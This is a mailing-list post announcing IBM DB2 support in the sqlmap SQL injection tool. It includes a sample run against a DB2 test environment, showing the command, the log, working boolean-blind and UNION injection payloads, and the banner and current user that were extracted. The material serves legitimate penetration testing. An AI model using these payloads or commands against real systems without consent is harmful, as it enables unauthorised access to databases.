Hi, The long awaited IBM DB2 support has been implemented in sqlmap. The patch has been provided by Sebastian Bittig of r-tec IT Systeme GmbH and merged in sqlmap repository after some tweaking by us. It is very stable for both DB2 8.x and 9.x branches. The patch includes support to fingerprint and enumerate data on IBM DB2 via boolean-based blind SQL injection and UNION query SQL injection. Hopefully, soon someone will come up with a payload for time-based and error-based techniques too. Support for direct connection to the DBMS (-d switch) will be implemented soon as well.
Thank you Sebastian and the rest of the team at r-tec for your patch and support! Sample run against an IBM DB2 9.7 test environment: --8<-- $ python sqlmap.py -u http://TARGET/page.php?id=1 -f -b --current-user sqlmap/1.0-dev (r4182) - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 10:56:21 [10:56:21] [INFO] using '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/TARGET/session' as session file [10:56:21] [INFO] testing connection to the target url [10:56:23] [INFO] heuristics detected web page charset 'ascii' [10:56:23] [INFO] testing if the url is stable, wait a few seconds [10:56:25] [INFO] url is stable [10:56:25] [INFO] testing if GET parameter 'id' is dynamic [10:56:26] [INFO] confirming that GET parameter 'id' is dynamic [10:56:26] [INFO] GET parameter 'id' is dynamic [10:56:27] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: DB2) [10:56:27] [INFO] testing sql injection on GET parameter 'id' [10:56:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [10:56:32] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable parsed error message(s) showed that the back-end DBMS could be DB2. Do you want to skip test payloads specific for other DBMSes? [Y/n] [10:56:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [10:56:49] [INFO] target url appears to be UNION injectable with 1 columns [10:56:51] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] sqlmap identified the following injection points with a total of 21 HTTP(s) requests: --- Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1' AND 7118=7118 AND 'Skhh'='Skhh Type: UNION query Title: Generic UNION query (NULL) - 1 to 10 columns Payload: id=1' UNION ALL SELECT CHR(58)||CHR(110)||CHR(114)||CHR(114)||CHR(58)||CHR(90)||CHR(103)||CHR(65)||CHR(88)||CHR(66)||CHR(109)||CHR(69)||CHR(74)||CHR(77)||CHR(117)||CHR(58)||CHR(101)||CHR(113)||CHR(108)||CHR(58) FROM SYSIBM.SYSDUMMY1-- AND 'QrLM'='QrLM --- [10:58:58] [INFO] testing IBM DB2 [10:58:59] [INFO] confirming IBM DB2 [10:59:12] [INFO] the back-end DBMS is IBM DB2 web server operating system: Windows web application technology: PHP 5.3.5, Apache 2.2.17 back-end DBMS: active fingerprint: IBM DB2 9.7 html error message fingerprint: DB2 [10:59:12] [INFO] fetching banner banner: 'DB2 v9.7.400.501' [10:59:13] [INFO] fetching current user current user: 'TEST' --8<-- Bernardo -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: Unavailable ------------------------------------------------------------------------------ All the data continuously generated in your IT infrastructure contains a definitive record of customers, application performance, security threats, fraudulent activity and more. Splunk takes this data and makes sense of it. Business sense. IT sense. Common sense.. http://p.sf.net/sfu/splunk-d2d-c1 _______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
